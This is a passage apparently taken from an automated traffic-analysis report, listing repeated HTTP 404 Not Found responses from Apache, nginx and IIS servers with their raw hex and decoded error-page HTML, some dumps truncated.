2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:38:10 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:38:13 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:38:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:38:18 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 23 Sep 2024 12:38:46 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-23T12:38:51.6173239Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 23 Sep 2024 12:39:27 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 23 Sep 2024 12:39:29 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 23 Sep 2024 12:39:32 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 23 Sep 2024 12:39:34 GMTConnection: closeContent-Length: 5115Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:40:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec 